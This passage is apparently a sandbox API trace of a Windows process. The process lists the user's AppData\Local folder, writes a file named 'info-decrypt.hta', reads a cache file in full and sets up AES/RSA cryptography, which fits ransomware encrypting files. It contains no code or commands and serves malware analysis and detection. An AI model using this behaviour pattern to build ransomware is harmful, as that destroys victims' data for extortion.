ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.589] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0197.590] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0197.590] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps", cAlternateFileName="")) returned 1 [0197.590] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0197.590] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 1 [0197.590] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0197.590] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0197.591] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8de8eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x126da7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0197.591] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0197.591] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0197.591] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0197.591] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0dcfaa0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xd0dcfaa0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0197.591] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0197.592] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0197.592] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0197.592] FindClose (in: hFindFile=0x77b330 | out: hFindFile=0x77b330) returned 1 [0197.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2ac) returned 1 [0197.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2b8) returned 1 [0197.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2ec) returned 1 [0197.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x71eedf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0197.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", nBufferLength=0x105, lpBuffer=0x71eedc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpFilePart=0x0) returned 0x2c [0197.592] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x71ef014 | out: lpFindFileData=0x71ef014*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b330 [0197.593] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.593] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0197.593] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0197.593] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apps", cAlternateFileName="")) returned 1 [0197.593] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0197.593] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0x0, dwReserved1=0x0, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 1 [0197.594] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0197.594] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0197.594] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8de8eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x126da7, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0197.594] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0197.594] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0197.594] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0197.594] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0dcfaa0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xd0dcfaa0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0197.595] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0197.595] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0197.595] FindNextFileW (in: hFindFile=0x77b330, lpFindFileData=0x71ef024 | out: lpFindFileData=0x71ef024*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0197.595] FindClose (in: hFindFile=0x77b330 | out: hFindFile=0x77b330) returned 1 [0197.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2ac) returned 1 [0197.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2b8) returned 1 [0197.595] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x71eedac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0197.595] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x71eeda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0197.595] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eedac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta", lpFilePart=0x0) returned 0x3c [0197.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef20c) returned 1 [0197.595] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef288 | out: lpFileInformation=0x71ef288*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0197.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef208) returned 1 [0197.596] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x71eeda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0197.596] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta", lpFilePart=0x0) returned 0x3c [0197.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef140) returned 1 [0197.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x59c [0197.597] GetFileType (hFile=0x59c) returned 0x1 [0197.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef13c) returned 1 [0197.597] GetFileType (hFile=0x59c) returned 0x1 [0197.597] WriteFile (in: hFile=0x59c, lpBuffer=0x3401f04*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x71ef204, lpOverlapped=0x0 | out: lpBuffer=0x3401f04*, lpNumberOfBytesWritten=0x71ef204*=0x1000, lpOverlapped=0x0) returned 1 [0197.598] WriteFile (in: hFile=0x59c, lpBuffer=0x3401f04*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x71ef1d8, lpOverlapped=0x0 | out: lpBuffer=0x3401f04*, lpNumberOfBytesWritten=0x71ef1d8*=0x557, lpOverlapped=0x0) returned 1 [0197.598] CloseHandle (hObject=0x59c) returned 1 [0197.598] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x71eed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0197.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1d4) returned 1 [0197.598] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), fInfoLevelId=0x0, lpFileInformation=0x3402f20 | out: lpFileInformation=0x3402f20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918)) returned 1 [0197.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef1d0) returned 1 [0197.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x71eec14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0197.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef108) returned 1 [0197.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x59c [0197.599] GetFileType (hFile=0x59c) returned 0x1 [0197.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef104) returned 1 [0197.599] GetFileType (hFile=0x59c) returned 0x1 [0197.599] GetFileSize (in: hFile=0x59c, lpFileSizeHigh=0x71ef210 | out: lpFileSizeHigh=0x71ef210*=0x0) returned 0x1a918 [0197.600] ReadFile (in: hFile=0x59c, lpBuffer=0x93291f0, nNumberOfBytesToRead=0x1a918, lpNumberOfBytesRead=0x71ef1bc, lpOverlapped=0x0 | out: lpBuffer=0x93291f0*, lpNumberOfBytesRead=0x71ef1bc*=0x1a918, lpOverlapped=0x0) returned 1 [0197.603] CloseHandle (hObject=0x59c) returned 1 [0197.603] CryptAcquireContextW (in: phProv=0x71ef15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x71ef15c*=0x7a9970) returned 1 [0197.604] CryptGenRandom (in: hProv=0x7a9970, dwLen=0x10, pbBuffer=0x3405804 | out: pbBuffer=0x3405804) returned 1 [0198.122] CryptImportKey (in: hProv=0x7a9970, pbData=0x343ddc8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x71ef12c | out: phKey=0x71ef12c*=0x77b130) returned 